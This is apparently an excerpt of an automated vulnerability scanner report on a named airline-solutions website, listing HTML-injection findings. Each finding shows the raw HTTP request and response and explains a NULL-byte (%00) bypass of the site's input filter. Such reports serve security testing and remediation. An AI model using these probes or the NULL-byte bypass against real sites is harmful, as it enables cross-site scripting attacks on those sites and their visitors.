Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322089; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A2%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A3%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A4%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:18:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322089; expires=Thu, 06-Oct-2011 02:18:05 GMT; path=/
Set-Cookie: exp_last_activity=1286349485; expires=Thu, 06-Oct-2011 02:18:05 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A3%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A4%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 02:18:25 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23600


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/products_services/sabre_aircentre_acars_manager/?%00e5318"><a>81d14d067ea=1">
...[SNIP]...

3.133. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_qualifier [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_crew_qualifier

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00cdd01"><a>07b8258c1ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cdd01"><a>07b8258c1ef in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/product/sabre_aircentre_crew_qualifier?%00cdd01"><a>07b8258c1ef=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322624; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A2%3Bs%3A45%3A%22%2Fproducts_services%2Fsabre_qik_analysis_system%2F%22%3Bi%3A3%3Bs%3A32%3A%22%2Fproducts_services%2Fcredit_suite%2F%22%3Bi%3A4%3Bs%3A45%3A%22%2Fproducts_services%2Ffrequent_flyer_management%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:11:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322624; expires=Thu, 06-Oct-2011 02:11:14 GMT; path=/
Set-Cookie: exp_last_activity=1286349074; expires=Thu, 06-Oct-2011 02:11:14 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A1%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fproducts_services%2Fsabre_qik_analysis_system%2F%22%3Bi%3A4%3Bs%3A32%3A%22%2Fproducts_services%2Fcredit_suite%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 02:12:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22829


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/products_services/sabre_aircentre_crew_qualifier?%00cdd01"><a>07b8258c1ef=1">
...[SNIP]...

3.134. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_community_portal [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_community_portal

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00422ae"><a>63ba76bb82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 422ae"><a>63ba76bb82 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/product/sabre_community_portal?%00422ae"><a>63ba76bb82=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:09:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316560; expires=Wed, 05-Oct-2011 17:09:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A50%3A%22%2Fproducts_services%2Fproduct%2Fsabre_community_portal%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:09:34 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21586


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/products_services/sabre_community_portal?%00422ae"><a>63ba76bb82=1">
...[SNIP]...

3.135. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_reaccommodation_manager/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0044679"><a>67dc0282d92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 44679"><a>67dc0282d92 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/product/sabre_reaccommodation_manager/?%0044679"><a>67dc0282d92=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 16:58:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286315923; expires=Wed, 05-Oct-2011 16:58:43 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 16:59:01 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/products_services/sabre_reaccommodation_manager/?%0044679"><a>67dc0282d92=1">
...[SNIP]...

3.136. http://www.sabreairlinesolutions.com/home/products_services/product_index [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product_index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007974b"><a>89efa2fb4bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7974b"><a>89efa2fb4bb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/product_index?%007974b"><a>89efa2fb4bb=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322639; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A4%3Bs%3A40%3A%22%2Fproducts_services%2Felectronic_ticketing%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:13:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322639; expires=Thu, 06-Oct-2011 09:13:04 GMT; path=/
Set-Cookie: exp_last_activity=1286374383; expires=Thu, 06-Oct-2011 09:13:04 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:13:19 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 85750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/products_services/product_index?%007974b"><a>89efa2fb4bb=1">
...[SNIP]...

3.137. http://www.sabreairlinesolutions.com/home/products_services/product_index [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product_index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00d10f1<a>b0e40c23345 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d10f1<a>b0e40c23345 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/product_index?%00d10f1<a>b0e40c23345=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322639; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A4%3Bs%3A40%3A%22%2Fproducts_services%2Felectronic_ticketing%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:17:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322639; expires=Thu, 06-Oct-2011 09:17:14 GMT; path=/
Set-Cookie: exp_last_activity=1286374634; expires=Thu, 06-Oct-2011 09:17:14 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:17:32 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 85746


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>b0e40c23345=1">product index?%00d10f1<a>b0e40c23345=1</a>
...[SNIP]...

3.138. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/services/airline_community

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0030872<a>2cdec2710d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30872<a>2cdec2710d7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/services/airline_community?%0030872<a>2cdec2710d7=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/services/airline_community/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322629; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A3%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3Bi%3A4%3Bs%3A50%3A%22%2Fproducts_services%2Fautomated_exchange_and_refunds%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:32:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322629; expires=Thu, 06-Oct-2011 03:32:53 GMT; path=/
Set-Cookie: exp_last_activity=1286353973; expires=Thu, 06-Oct-2011 03:32:53 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A4%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:33:07 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21221


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>2cdec2710d7=1">airline community?%0030872<a>2cdec2710d7=1</a>
...[SNIP]...

3.139. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/services/airline_community/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f90d8"><a>16834f00eec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f90d8"><a>16834f00eec in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/services/airline_community/?%00f90d8"><a>16834f00eec=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322217; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A2%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:24:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322217; expires=Thu, 06-Oct-2011 03:24:56 GMT; path=/
Set-Cookie: exp_last_activity=1286353496; expires=Thu, 06-Oct-2011 03:24:56 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A2%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A3%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:25:04 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21297


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/services/airline_community/?%00f90d8"><a>16834f00eec=1">
...[SNIP]...

3.140. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/services/airline_community/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00df39f<a>023789d0898 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as df39f<a>023789d0898 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/services/airline_community/?%00df39f<a>023789d0898=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322217; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A2%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:26:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322217; expires=Thu, 06-Oct-2011 03:26:34 GMT; path=/
Set-Cookie: exp_last_activity=1286353594; expires=Thu, 06-Oct-2011 03:26:34 GMT; path=/
